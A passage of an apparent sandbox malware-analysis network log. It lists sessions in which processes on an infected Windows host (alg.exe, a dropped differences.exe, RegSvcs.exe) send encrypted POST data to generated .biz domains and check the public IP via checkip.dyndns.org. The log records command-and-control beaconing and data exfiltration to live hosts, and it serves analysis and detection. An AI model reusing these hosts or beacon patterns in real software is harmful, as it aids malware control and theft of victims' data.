    Date: Mon, 02 Dec 2024 06:56:17 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=47e396f0b0db7b0277ce71b5c8c78bea|8.46.123.228|1733122577|1733122577|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
6           192.168.2.4  49738        172.234.222.138  80                7412  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 2, 2024 07:56:18.137799978 CET  357  OUT  POST /widfafwxfswrij HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Dec 2, 2024 07:56:18.137904882 CET  778  OUT  Data Raw: f5 a7 2e 35 f4 2c 59 c6 fe 02 00 00 81 18 60 e4 53 cc 17 e0 4f 67 c0 fe 3d 0a bd f0 78 fa af 95 f7 2d 0e ed 47 ee ff 0d 03 28 54 fa 1c b4 40 38 c5 d7 94 97 85 5f 0c 7d 49 6b a7 c7 71 8a e9 e2 f8 d6 31 46 36 17 3f 1f 8d 9a 74 e2 ac 62 ac 43 a3 48
    Data Ascii: .5,Y`SOg=x-G(T@8_}Ikq1F6?tbCHXPz`A?d'C;]'oM~8bP2B6?z3t|^85abonZH7#Tkyi45NmFq KMKL{F;/p8NA}l(]
Dec 2, 2024 07:56:19.299092054 CET  476  IN   HTTP/1.1 302 Moved Temporarily
    Server: openresty
    Date: Mon, 02 Dec 2024 06:56:19 GMT
    Content-Type: text/html
    Content-Length: 142
    Connection: keep-alive
    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
    Location: http://ww99.przvgke.biz/widfafwxfswrij
    Cache-Control: no-store, max-age=0
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Dec 2, 2024 07:56:22.955192089 CET  348  OUT  POST /jenyp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: przvgke.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Dec 2, 2024 07:56:22.955224991 CET  778  OUT  Data Raw: 24 1f 08 ee cb 31 fb dd fe 02 00 00 cd c5 d1 1f a6 b5 d7 f4 d5 71 e5 ae 02 18 b5 d8 47 6a 5f 2c dc 8c 7a 95 20 cf 1c 8e 63 cf 3e 39 67 28 7b ce 1a f8 34 1c 2f 4b 50 3c 04 7a 3f 12 b3 10 b4 90 fc fa ec 9e 5b d3 25 5e 09 e2 96 bc df cf 94 59 30 fd
    Data Ascii: $1qGj_,z c>9g({4/KP<z?[%^Y0BF@<>x'U8@%fyZ9ua3~^L`\?@GH+NA'W~T~V6]$|uKuP~cfN(\'/nG|w{rrZ%k"0|
Dec 2, 2024 07:56:23.303093910 CET  467  IN   HTTP/1.1 302 Moved Temporarily
    Server: openresty
    Date: Mon, 02 Dec 2024 06:56:23 GMT
    Content-Type: text/html
    Content-Length: 142
    Connection: keep-alive
    Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
    Location: http://ww99.przvgke.biz/jenyp
    Cache-Control: no-store, max-age=0
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
7           192.168.2.4  49740        72.52.179.174    80                7412  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 2, 2024 07:56:19.839653015 CET  340  OUT  GET /widfafwxfswrij HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww99.przvgke.biz
Dec 2, 2024 07:56:21.104057074 CET  287  IN   HTTP/1.1 302 Moved Temporarily
    Date: Mon, 02 Dec 2024 06:56:20 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: keep-alive
    Location: http://ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590
    Cache-Control: no-cache
    Pragma: no-cache
    Access-Control-Allow-Origin: *
Dec 2, 2024 07:56:23.322401047 CET  331  OUT  GET /jenyp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww99.przvgke.biz
Dec 2, 2024 07:56:23.715461016 CET  279  IN   HTTP/1.1 302 Moved Temporarily
    Date: Mon, 02 Dec 2024 06:56:23 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: keep-alive
    Location: http://ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
    Cache-Control: no-cache
    Pragma: no-cache
    Access-Control-Allow-Origin: *


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
8           192.168.2.4  49742        199.59.243.227   80                7412  C:\Windows\System32\alg.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 2, 2024 07:56:21.940155983 CET  363  OUT  GET /widfafwxfswrij?usid=26&utid=9204703590 HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Host: ww7.przvgke.biz
Dec 2, 2024 07:56:22.876645088 CET  1236  IN  HTTP/1.1 200 OK
    date: Mon, 02 Dec 2024 06:56:22 GMT
    content-type: text/html; charset=utf-8
    content-length: 1146
    x-request-id: 0becd7c5-e41d-4b5b-a6a4-c552f2fb6539
    cache-control: no-store, max-age=0
    accept-ch: sec-ch-prefers-color-scheme
    critical-ch: sec-ch-prefers-color-scheme
    vary: sec-ch-prefers-color-scheme
    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rMRrSltRJGGCoRInNFzFwrFLP6vcGf9ef1cI4JUhJJNL11qoZJhu3ianJ4nRSz1Ti/U2pYGOfIDwDlYcIeY3dw==
    set-cookie: parking_session=0becd7c5-e41d-4b5b-a6a4-c552f2fb6539; expires=Mon, 02 Dec 2024 07:11:22 GMT; path=/
    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 4d 52 72 53 6c 74 52 4a 47 47 43 6f 52 49 6e 4e 46 7a 46 77 72 46 4c 50 36 76 63 47 66 39 65 66 31 63 49 34 4a 55 68 4a 4a 4e 4c 31 31 71 6f 5a 4a 68 75 33 69 61 6e 4a 34 6e 52 53 7a 31 54 69 2f 55 32 70 59 47 4f 66 49 44 77 44 6c 59 63 49 65 59 33 64 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_rMRrSltRJGGCoRInNFzFwrFLP6vcGf9ef1cI4JUhJJNL11qoZJhu3ianJ4nRSz1Ti/U2pYGOfIDwDlYcIeY3dw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Dec 2, 2024 07:56:22.876770020 CET  580  IN   Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
    Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGJlY2Q3YzUtZTQxZC00YjViLWE2YTQtYzU1MmYyZmI2NTM5IiwicGFnZV90aW1lIjoxNzMzMTIyNTgyLCJwYWdlX3VybCI6I


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
9           192.168.2.4  49744        54.244.188.177   80                7824  C:\Users\user\AppData\Local\subpredicate\differences.exe

Timestamp                           Bytes transferred  Direction  Data
Dec 2, 2024 07:56:22.828371048 CET  347  OUT  POST /hx HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 842
Dec 2, 2024 07:56:22.828392029 CET  842  OUT  Data Raw: 64 70 a3 33 7b 6a 39 29 3e 03 00 00 69 40 0b 5e e6 66 bf 03 9b a5 ea a8 6c 7a 88 06 18 83 c2 4c 3b ce 24 8b 42 b2 c6 ce b7 96 9c f4 15 d3 d4 5c 31 31 a5 db cd 36 6b d5 38 8e a6 e2 cf 03 8c 5d f0 e5 62 78 83 fb c9 79 66 5e 7e e6 b0 1e d1 97 75 72
    Data Ascii: dp3{j9)>i@^flzL;$B\116k8]bxyf^~ur!T <^GDE0'njy-:2KA"#`tc251L;kYtt=t\-"6[$}R>[-Gc_w>G*>X
Dec 2, 2024 07:56:24.211800098 CET  413  IN   HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 02 Dec 2024 06:56:23 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=6664838dda604d8489eab6e8e9d657c3|8.46.123.228|1733122583|1733122583|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49746 | 13.248.148.254 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:56:24.334875107 CET | 355 | OUT | GET /jenyp?usid=26&utid=9204704395 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Host: ww12.przvgke.biz
Dec 2, 2024 07:56:25.686561108 CET | 825 | IN | HTTP/1.1 200 OK
Accept-Ch: viewport-width
Accept-Ch: dpr
Accept-Ch: device-memory
Accept-Ch: rtt
Accept-Ch: downlink
Accept-Ch: ect
Accept-Ch: ua
Accept-Ch: ua-full-version
Accept-Ch: ua-platform
Accept-Ch: ua-platform-version
Accept-Ch: ua-arch
Accept-Ch: ua-model
Accept-Ch: ua-mobile
Accept-Ch-Lifetime: 30
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 Dec 2024 06:56:25 GMT
Server: Caddy
Server: nginx
Vary: Accept-Encoding
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_C2dUGRDxFOAyAoYhIlQhGKJ5kId4Ic2dCDtaycXMGj9OKotzzqE9GzFgtYlYEOJITSikNr3yli0+AoPz4kyEZw==
X-Domain: przvgke.biz
X-Pcrew-Blocked-Reason:
X-Pcrew-Ip-Organization: CenturyLink
X-Subdomain: ww12
Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49747 | 54.244.188.177 | 80 | 7896 | C:\Users\user\AppData\Local\subpredicate\differences.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:56:25.078569889 CET | 349 | OUT | POST /nwqf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 842
Dec 2, 2024 07:56:25.078569889 CET | 842 | OUT | Data Raw: 17 db f5 2b eb b0 c0 28 3e 03 00 00 1a 1d 81 82 d4 af 55 f6 39 d9 d8 39 9e 4c 93 1e 44 8c 60 1d 33 1b ff 65 7c ab 36 5e a7 c0 c2 b1 dc 21 38 86 06 88 2f d0 30 7a 89 87 c8 96 9a 84 17 f2 6c d8 cd d8 4a e9 75 5a 3c dc dd d7 ba 8f e5 ce 2d 96 48 3d
Data Ascii: +(>U99LD`3e|6^!8/0zlJuZ<-H=[%_%dl(+L^t?%3+/nl&am]W,[GQX13*pQQ]<TE^%5TghdP`-txa%.9PM%Vt3Rx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49749 | 193.122.130.0 | 80 | 8008 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:56:25.769506931 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 2, 2024 07:56:27.322065115 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 02 Dec 2024 06:56:27 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 48104a577bb97c1f24916c12e90bfcb1
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 2, 2024 07:56:27.328289986 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 2, 2024 07:56:27.664407015 CET | 321 | IN | HTTP/1.1 200 OK
Date: Mon, 02 Dec 2024 06:56:27 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: fbf0f878860c5b929d327325b0bd51d6
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49750 | 18.141.10.107 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:56:26.990027905 CET | 346 | OUT | POST /rq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:56:26.990071058 CET | 778 | OUT | Data Raw: bf e3 aa 29 e2 0a cd 3d fe 02 00 00 42 67 7c ad 40 bb 60 38 be 6f 2e 43 21 12 02 3d 06 90 e7 c6 81 ac e7 e0 9d 6d d8 3f 9a 1e f7 71 47 b7 8c a1 cf b5 e1 d3 8d 49 50 bd 6a be 03 37 1b 4f 84 23 58 dd 6d 0a d6 40 ef 24 ca 73 cf 7d f9 ae bf 50 6c bc
Data Ascii: )=Bg|@`8o.C!=m?qGIPj7O#Xm@$s}Pl *6s!z8Dbg/nV!9%87m?41o7ReuS&@O4oU{!8]/uJTSranO #8mu~%3D 9ZD$Xs48ISM
Dec 2, 2024 07:56:29.092554092 CET | 412 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Dec 2024 06:56:28 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5cc76833bfeb0c5f2d8169b837090f00|8.46.123.228|1733122588|1733122588|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49753 | 82.112.184.197 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:56:30.512433052 CET | 351 | OUT | POST /vtrrtopft HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:56:30.512454987 CET | 778 | OUT | Data Raw: e1 f3 7a 9c 42 9c 57 bc fe 02 00 00 8d 44 4b fd 39 95 36 9a 80 ae a5 e3 d1 09 b9 e0 0b 11 e0 c7 c2 cf e5 11 f6 a7 47 78 fa 49 48 78 f3 bd fd ca 22 c5 97 c1 bc 1d 61 f5 21 fa 2f 23 90 1a f8 6e 91 d0 22 27 75 47 df 96 a2 72 b7 c1 6c 84 7c f6 41 54
Data Ascii: zBWDK96GxIHx"a!/#n"'uGrl|ATHn]g3T:/qf\iKU4h!~gsSA g`Xx%xHf|9o+2qwCg;}_L\Lw+4FKsm{1R@+o`kp5a~


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49754 | 82.112.184.197 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:56:52.610747099 CET | 350 | OUT | POST /dmksqnbs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:56:52.610761881 CET | 778 | OUT | Data Raw: b7 ce 37 62 62 ce 74 31 fe 02 00 00 f9 0b 00 55 79 cf 51 03 bd 09 c5 22 87 ed 47 ba 28 8f b4 1c fa 3d 6c ee 0f de e0 7f bd 89 56 85 26 d8 ef 85 ce 51 3c 7e bb 57 2e 93 28 42 f5 ad bf 6d ca 96 53 f4 fb a3 1d 67 73 58 66 36 c5 4a ca 72 83 46 92 ca
Data Ascii: 7bbt1UyQ"G(=lV&Q<~W.(BmSgsXf6JrF9oGe7^y=K.:TS;o@+Nd-x%>Fy%i@'q:%n._QumKWJ4;+Orrx*5U03


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49790 | 82.112.184.197 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:57:16.047380924 CET | 348 | OUT | POST /vip HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:57:16.047435045 CET | 778 | OUT | Data Raw: 45 9d cc 4b 9a 73 08 98 fe 02 00 00 4e 46 4b eb 03 c9 8b 46 85 1f 11 8e 6c e8 6e db 9f 73 db 99 fc e4 96 35 c4 a2 fc da 85 68 8f 37 54 63 7c 77 b8 d3 05 50 5d 9f 68 af d1 c9 8c a6 cd e0 95 e6 b4 f7 5f 3a 24 48 f0 ca 5a 8a 1c db 1f 16 2d 3b f9 32
Data Ascii: EKsNFKFlns5h7Tc|wP]h_:$HZ-;2h)FQg+qFuw.WR~`cx,rKQ*hADCR?g&wp\2^WB(9S;5:y_$%D$6e5-0x.x<0:c!U


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49840 | 82.112.184.197 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:57:38.377584934 CET | 361 | OUT | POST /lhocoojsqrafriia HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vjaxhpbji.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:57:38.377609968 CET | 778 | OUT | Data Raw: 7f f0 c3 c6 7a 93 5e ac fe 02 00 00 5a 33 70 54 9a 8d 69 e5 6b 2b 0d 9f 49 84 ff 41 ff 81 76 73 c2 8e 28 dc b4 e0 e2 f0 f4 09 01 cb c1 3b f9 40 cb 83 af 9c e7 f8 83 d5 99 eb 00 5c b2 b7 9c 6e 94 fd 19 73 89 5c ec f4 9d b7 b8 d8 1f 42 1b 32 58 f9
Data Ascii: z^Z3pTik+IAvs(;@\ns\B2Xy4FdrZ W!6:KSs~CG"oTqI_* 6dzpxfNvl<LO~Lc;\bSrR^9S UO#\z~d5,


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49872 | 47.129.31.212 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 07:57:53.000236988 CET | 357 | OUT | POST /fnbbnvvirqhlfx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Dec 2, 2024 07:57:53.000269890 CET | 778 | OUT | Data Raw: 1d 5b 21 84 ad e7 05 7c fe 02 00 00 3d 05 24 ef 2e 77 88 9b de 4f 0c 1d 88 82 00 a5 99 88 b3 49 b8 99 dc 2d 39 6d 82 91 bd e1 3a 64 6c 18 b1 98 59 42 19 c0 47 31 64 eb 67 c6 54 3c 29 3a 31 27 3b 5f e7 b5 5a 98 a4 f8 f9 44 28 86 a6 d5 d6 15 d5 0a
Data Ascii: [!|=$.wOI-9m:dlYBG1dgT<):1';_ZD(5\g%=)s:ij9|\P\(vQ+)`IXs&Hui?D%mod8s+>'bntwA7YG}BQmk5u{`}Pm!WSoEk2
Dec 2, 2024 07:57:55.104959965 CET | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 Dec 2024 06:57:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=95f091603713460660fe7370fab13636|8.46.123.228|1733122674|1733122674|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49881 | 13.251.16.150 | 80 | 7412 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
